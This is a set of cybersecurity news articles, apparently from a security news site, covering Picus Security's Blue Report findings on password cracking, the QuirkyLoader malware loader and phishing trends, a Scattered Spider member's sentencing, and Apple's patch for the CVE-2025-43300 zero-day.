As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts . Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing password cracking attacks and detecting the malicious use of compromised accounts . With the first half of 2025 behind us, compromised valid accounts remain the most underprevented attack vector , highlighting the urgent need for a proactive approach focused on the threats that are evading organizations’ defenses.

A Wake-Up Call: The Alarming Rise in Password Cracking Success The Picus Blue Report is an annual research publication that analyzes how well organizations are preventing and detecting real-world cyber threats. Unlike traditional reports that focus solely on threat trends or survey data, the Blue Report is based on empirical findings from over 160 million attack simulations conducted within organizations’ networks around the world, using the Picus Security Validation Platform . In the Blue Report 2025 , Picus Labs found that password cracking attempts succeeded in 46% of tested environments , nearly doubling the success rate from last year. This sharp increase highlights a fundamental weakness in how organizations are managing – or mismanaging – their password policies.

Weak passwords and outdated hashing algorithms continue to leave critical systems vulnerable to attackers using brute-force or rainbow table attacks to crack passwords and gain unauthorized access. Given that password cracking is one of the oldest and most reliably effective attack methods , this finding points to a serious issue: in their race to combat the latest, most sophisticated new breed of threats, many organizations are failing to enforce strong basic password hygiene policies while failing to adopt and integrate modern authentication practices into their defenses . Why Organizations Are Failing to Prevent Password Cracking Attacks So, why are organizations still failing to prevent password cracking attacks? The root cause lies in the continued use of weak passwords and outdated credential storage methods .

Many organizations still rely on easily guessable passwords and weak hashing algorithms, often without using proper salting techniques or multi-factor authentication (MFA). In fact, our survey results showed that 46% of environments had at least one password hash cracked and converted to cleartext, highlighting the inadequacy of many password policies, particularly for internal accounts , where controls are often more lax than they are for their external counterparts. To combat this, organizations must enforce stronger password policies , implement multi-factor authentication (MFA) for all users , and regularly validate their credential defenses . Without these improvements, attackers will continue to compromise valid accounts, obtaining easy access to critical systems.

Credential-Based Attacks: A Silent but Devastating Threat The threat of credential abuse is both pervasive and dangerous, yet as the Blue Report 2025 highlights, organizations are still underprepared for this form of attack. And once attackers obtain valid credentials, they can easily move laterally , escalate privileges , and compromise critical systems . Infostealers and ransomware groups frequently rely on stolen credentials to spread across networks , burrowing deeper and deeper, often without triggering detection . This stealthy movement within the network allows attackers to maintain long dwell times , undetected, while they exfiltrate data at will .

Despite this ongoing and well-known issue, organizations continue to prioritize perimeter defenses, often leaving identity and credential protection overlooked and under-funded as a result. This year’s Blue Report clearly shows that valid account abuse is at the core of modern cyberattacks, reinforcing the urgent need for a stronger focus on identity security and credential validation . Valid Accounts (T1078): The Most Exploited Path to Compromise One of the key findings in the Blue Report 2025 is that Valid Accounts (MITRE ATT&CK T1078) remains the most exploited attack technique , with a truly concerning 98% success rate . This means that once attackers gain access to valid credentials, whether through password cracking or initial access brokers , they can swiftly move through an organization’s network, often bypassing traditional defenses.

The use of compromised credentials is particularly effective because it allows attackers to operate under the radar , making it harder for security teams to detect malicious activity. Once inside, they can access sensitive data , deploy malware , or create new attack paths , all while seamlessly blending in with legitimate user activity. How to Strengthen Your Defenses Against Credential Abuse and Password Cracking To protect against increasingly effective attacks, organizations should implement stronger password policies and enforce complexity requirements , while eliminating outdated hashing algorithms in favor of more secure alternatives. It is also essential to adopt multi-factor authentication (MFA) for all sensitive accounts, ensuring that even if credentials do become compromised, attackers can’t just use them to access the network without an additional verification step.

Regularly validating credential defenses through simulated attacks is crucial to identifying vulnerabilities and ensuring that your controls are performing as expected. Organizations also need to enhance their behavioral detection capabilities to catch anomalous activities tied to credential abuse and lateral movement. Additionally, monitoring and inspecting outbound traffic for signs of data exfiltration and ensuring that data loss prevention (DLP) measures are both in place and operating effectively are critical to protecting your sensitive information. Closing the Gaps in Credential and Password Management The findings in the Blue Report 2025 show that, unfortunately, many organizations are still vulnerable to the silent threat of password cracking and compromised accounts .

And while strengthening perimeter defenses continues to be a priority, it’s also clear that core weaknesses lie in credential management and internal controls . The report also highlighted the fact that infostealers and ransomware groups are leveraging these gaps effectively. If you’re ready to take proactive steps to harden your security posture , reduce your exposure , and prioritize your critical vulnerabilities , the Blue Report 2025 offers invaluable insights to show you where to focus. And at Picus Security , we’re always happy to talk about helping your organization meet its specific security needs..

Don’t forget to get your copy of The Blue Report 2025 and take proactive steps today to improve your security posture. Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Hackers Using New QuirkyLoader Malware to Spread Agent Tesla, AsyncRAT and Snake Keylogger

Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that’s being used to deliver via email spam campaigns an array of next-stage payloads ranging from information stealers to remote access trojans since November 2024. Some of the notable malware families distributed using QuirkyLoader include Agent Tesla , AsyncRAT , Formbook , Masslogger , Remcos RAT , Rhadamanthys Stealer , and Snake Keylogger . IBM X-Force, which detailed the malware, said the attacks involve sending spam emails from both legitimate email service providers and a self-hosted email server. These emails feature a malicious archive, which contains a DLL, an encrypted payload, and a real executable.

“The actor uses DLL side-loading, a technique where launching the legitimate executable also loads the malicious DLL,” security researcher Raymond Joseph Alfonso said . “This DLL, in turn, loads, decrypts, and injects the final payload into its target process.” This is achieved by using process hollowing to inject the malware into one of the three processes: AddInProcess32.exe, InstallUtil.exe, or aspnet_wp.exe. The DLL loader, per IBM, has been used in limited campaigns for the past few months, with two campaigns observed in July 2025 targeting Taiwan and Mexico. The campaign targeting Taiwan is said to have specifically singled out employees of Nusoft Taiwan, a network and internet security research company based in New Taipei City, with the goal of infecting them with Snake Keylogger, which is capable of stealing sensitive information from popular web browsers, keystrokes, and clipboard content.

The Mexico-related campaign, on the other hand, is assessed to be random, with the infection chains delivering Remcos RAT and AsyncRAT. “The threat actor consistently writes the DLL loader module in .NET languages and uses ahead-of-time (AOT) compilation,” Alfonso said. “This process compiles the code into native machine code before execution, making the resulting binary appear as though it were written in C or C++.” New Phishing Trends The development comes as threat actors are using new QR code phishing (aka quishing) tactics like splitting malicious QR codes into two parts or embedding them within legitimate ones in email messages propagated via phishing kits like Gabagool and Tycoon, respectively, to evade detection, demonstrating ongoing evolution. “Malicious QR codes are popular with attackers for several reasons,” Barracuda researcher Rohit Suresh Kanase said .

“They cannot be read by humans so don’t raise any red flags, and they can often bypass traditional security measures such as email filters and link scanners.” “Furthermore, since recipients often have to switch to a mobile device to scan the code, it can take users out of the company security perimeter and away from protection.” The findings also follow the emergence of a phishing kit used by the PoisonSeed threat actor to acquire credentials and two-factor authentication (2FA) codes from individuals and organizations to gain access to victims’ accounts and use them to send emails for carrying out cryptocurrency scams. “The domains hosting this phishing kit impersonate login services from prominent CRM and bulk email companies like Google, SendGrid, Mailchimp, and likely others, targeting individuals’ credentials,” NVISO Labs said . “PoisonSeed employs spear-phishing emails embedding malicious links, which redirect victims to their phishing kit.” A noteworthy aspect of the kit is the use of a technique known as precision-validated phishing in which the attacker validates an email address in real-time in the background, while a fake Cloudflare Turnstile challenge is served to the user. Once the checks are passed, a login form impersonating the legitimate online platform appears, allowing the threat actors to capture submitted credentials and then relay them to the service.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Scattered Spider Hacker Gets 10 Years, $13M Restitution for SIM Swapping Crypto Theft

A 20-year-old member of the notorious cybercrime gang known as Scattered Spider has been sentenced to ten years in prison in the U.S. in connection with a series of major hacks and cryptocurrency thefts. Noah Michael Urban pleaded guilty to charges related to wire fraud and aggravated identity theft back in April 2025. News of Urban’s sentencing was reported by Bloomberg and Jacksonville news outlet News4JAX .

In addition, 120 months in federal prison, Urban faces an additional three years of supervised release and has been ordered to pay $13 million in restitution to victims. In a statement shared with security journalist Brian Krebs, Urban called the sentence unjust. Urban, who also went by the aliases Sosa, Elijah, King Bob, Gustavo Fring, and Anthony Ramirez, was arrested by U.S. authorities in Florida in January 2024 for committing wire fraud and aggravated identity theft between August 2022 and March 2023.

These incidents led to the theft of at least $800,000 from at least five different victims, per the U.S. Department of Justice (DoJ). Prosecutors said Urban and his co-conspirators engaged in SIM swapping attacks to hijack victims’ cryptocurrency accounts and plunder the digital assets. Later that November, the DoJ unsealed criminal charges against Urban and four other members of Scattered Spider for using social engineering techniques to target employees of companies across the U.S.

and to break into corporate networks and steal proprietary data and to siphon millions of dollars in cryptocurrency. Tyler Robert Buchanan, who is among those indicted, was extradited from Spain to the U.S. in April following his arrest in the European nation last June. The development comes as Scattered Spider has joined forces with other threat groups ShinyHunters and LAPSUS$ to form a new cybercrime alliance.

The group, associated with a broader English-speaking cybercriminal collective called The Com, has a history of conducting social engineering, credential theft, and SIM swapping, initial access, ransomware deployment, data theft, and extortion attacks. “Scattered Spider has historically leaned on tactics that generate urgency, drive media and industry attention, create fear of exposure, and help force victims to payout quicker,” Adam Darrah, vice president of intelligence at ZeroFox, told The Hacker News in a statement. “Timed leaks, countdown threats, and taunts directed at security firms are all part of their playbook. They have ties to a wider network of like-minded actors, which has given them access to more tools, data, and infrastructure, multiplying their effectiveness.

We regularly see groups team up when there is an increase in external pressures, like law enforcement crackdowns. To survive, these groups need to consolidate. And the result is often a more versatile and potentially dangerous combined operation.” Cybersecurity firm Flashpoint, which published a profile of Scattered Spider last week, said the financially-motivated hacking group adopts a wave-like approach by choosing a specific sector and attacking as many organizations within that vertical over a short span of time. “The tactics employed by Scattered Spider demonstrate their ability to exploit weaknesses in security programs by targeting people rather than strictly systems or technical vulnerabilities,” it said .

“Their use of social engineering, via vishing, smishing, and MFA fatigue attacks, proves that even the most advanced technical defenses can be circumvented through human deception.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks

Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild. The zero-day out-of-bounds write vulnerability, tracked as CVE-2025-43300 (CVSS score: 8.8), resides in the ImageIO framework that could result in memory corruption when processing a malicious image. “Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals,” the company said in an advisory. The iPhone maker said the bug was internally discovered and that it was addressed with improved bounds checking.

The following versions address the security defect - iOS 18.6.2 and iPadOS 18.6.2

iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later iPadOS 17.7.10
iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation macOS Ventura 13.7.8
Macs running macOS Ventura macOS Sonoma 14.7.8
Macs running macOS Sonoma macOS Sequoia 15.6.1
Macs running macOS Sequoia It’s currently not known who is behind the attacks and who may have been targeted, but it’s likely that the vulnerability has been weaponised as part of highly targeted attacks. With the latest update, Apple has so far fixed a total of seven zero-days that have been abused in real-world attacks since the start of the year: CVE-2025-24085 , CVE-2025-24200 , CVE-2025-24201 , CVE-2025-31200, CVE-2025-31201 , and CVE-2025-43200 . Last month, the company also issued patches for a Safari vulnerability residing in an open-source component ( CVE-2025-6558 ) that Google reported as having been exploited as a zero-day in the Chrome web browser. Found this article interesting?